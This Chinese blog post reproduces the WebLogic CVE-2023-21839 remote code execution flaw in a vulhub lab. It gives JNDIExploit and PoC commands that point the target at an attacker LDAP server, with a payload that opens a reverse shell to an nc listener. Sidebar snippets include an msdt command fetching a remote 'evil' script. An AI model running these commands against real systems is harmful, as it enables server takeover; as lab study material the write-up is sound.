CVE-2023-21839远程代码执行漏洞

最新推荐文章于 2024-04-29 17:42:52 发布
最新推荐文章于 2024-04-29 17:42:52 发布
阅读量1.5k 收藏 3
点赞数
分类专栏: 攻防技术 文章标签: 网络 java linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LDBQH/article/details/130459956
版权

一、环境搭建

使用vulhub快速搭建环境

进入weblogic/CVE-2023-210839目录下,执行命令:

docker-compose up -d

部署完成后直接访问7001端口即可

http://192.168.5.183:7001/console

二、漏洞利用

此漏洞是需要远程加载恶意类来实现攻击,需要JNDIExploit工具在远程开启服务实现恶意类的加载

java -jar JNDIExploit.jar --ip {接收shell的ip}

使用java -jar JNDIExploit-1.4-SNAPSHOT.jar -u命令查看payload,使用如下payload:

ldap://{JNDIExploit启动ldap服务的IP}:1389/Basic/ReverseShell/{开启nc服务的ip}/{nc端口}

开启nc监听,用来接收回连的shell:

用来发送payload的poc程序:

GitHub - 4ra1n/CVE-2023-21839: Weblogic CVE-2023-21839 / CVE-2023-21931 / CVE-2023-21979 一键检测

本PoC是针对CVE-2023-21839编写的,实际上同时覆盖了CVE-2023-21931和CVE-2023-21979。因为这三个漏洞触发机制相同,且补丁方式相同,所以只要存在一个,那么其他两个也存在。

此poc使用go语言编写,使用命令编译成可执行文件:

cd cmd

go build -o CVE-2023-21839.exe

CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

dnslog探测:

CVE-2023-21839.exe -ip {weblogic服务器ip} -port 7001 -ldap ldap://ug9h0m.dnslog.cn

反弹shell,ldap参数需要修改为JNDIExploit生成的payload

CVE-2023-21839.exe -ip {weblogic服务器ip} -port 7001 -ldap ldap://{JNDIExploit启动ldap服务的IP}:1389/Basic/ReverseShell/{开启nc服务的ip}/{nc端口}

三、修复方案

目前官方已经发布了补丁,此漏洞还是出在T3和IIOP协议上,禁用此协议也可规避漏洞。

十九线菜鸟学安全
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-21839:Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3625
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
漏洞复现】Weblogic CVE-2023-21839
zg_111的博客
03-23 6379
Weblogic CVE-2023-21839漏洞复现
IOT病毒分析
最新发布
GalaxySpaceX的博客
04-29 1354
IOT病毒分析
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)
Innocence_0的博客
10-07 141
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
WinRAR 0day CVE-2023-38831分析复现及poc
yuanlirong22的专栏
08-27 2283
最近WinRAR 的CVE-2023-38831 漏洞被在野利用POC已可使用。漏洞影响版本:WinRa
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
【Rainbow Network Technology co., LTD】
08-25 1507
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法的文件时,即被安装恶意程序。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响的 NetScaler ADC 和 NetScaler Gateway 客户尽快安装相关的更新版本。 NetScaler ADC 和 ...
CVE-2023-38831(Winrar RCE)漏洞复现与分析
m0_55994898的博客
12-10 1794
本文对Winrar RCE漏洞(CVE-2023-38831)进行复现以及原理分析,对攻击过程进行还原,让你更直观的感受此漏洞的攻击面。对于Reverse本人并不擅长,所以此篇文章参考了很多互联网公开的对此漏洞的研究分析报告,文末标注。
Weblogic远程代码执行漏洞CVE-2023-21839)复现
yunshang_secure的博客
12-23 1830
复现过程中,会出现各种各样报错,小伙伴多找网上文章解决,本文仅作参考。
Google Chrome 任意文件读取 (CVE-2023-4357)漏洞复现
huangyongkang666的博客
11-18 3620
Google Chrome 任意文件读取漏洞(CVE-2023-4357)
漏洞分析|Metabase 代码执行漏洞CVE-2023-38646):H2 JDBC 深入利用
m0_46699477的博客
07-28 1792
利用 TRIGGER + DefineClass 完整的实现了 JAVA 代码执行漏洞回显。
CVE-2023-27253-pfsense命令注入漏洞复现(含exp)
zwy15288408160的博客
09-29 1438
NetGate Pfsense
MinIO信息泄露漏洞(CVE-2023-28432)批量检测POC
热门推荐
今天是几号的博客
03-28 1万+
MinIO 是一种开源对象存储服务,与 Amazon S3 API 兼容,可用于私有云或公共云。MinIO是一种高性能、高可用的分布式存储系统,可以存储大量数据,并提供高速的数据读写能力。MinIO采用分布式架构,可以在多个节点上运行,实现数据的分布式存储和处理。在集群部署的Minio中,未授权的攻击者可发送恶意的HTTP请求来获取Minio环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录Minio。
CVE-2023-21839 Weblogic未授权RCE
bring_coco的博客
08-29 1145
https://github.com/4ra1n/CVE-2023-21839下载之后。然后用JNDIExploit-1.4-SNAPSHOT.jar监听jndi端口。然后使用JNDIExploit-1.4-SNAPSHOT.jar进行攻击。生成CVE-2023-21389.exe。这样就成功弹回了shell。
CVE-2023-33246命令执行复现分析
蚁景网安学院
06-16 691
简介RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。既可为分布式应用系统提供异步解耦和削峰填谷的能力,同时也具备互联网应用所需的海量消息堆积、高吞吐、可靠重试等特性。影响版本<=RocketMQ 5.1.0<=RocketMQ 4.9.5环境搭建dockerpullapache/rocketmq:4.9.4root@ubuntu:/home/ubuntu/D...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值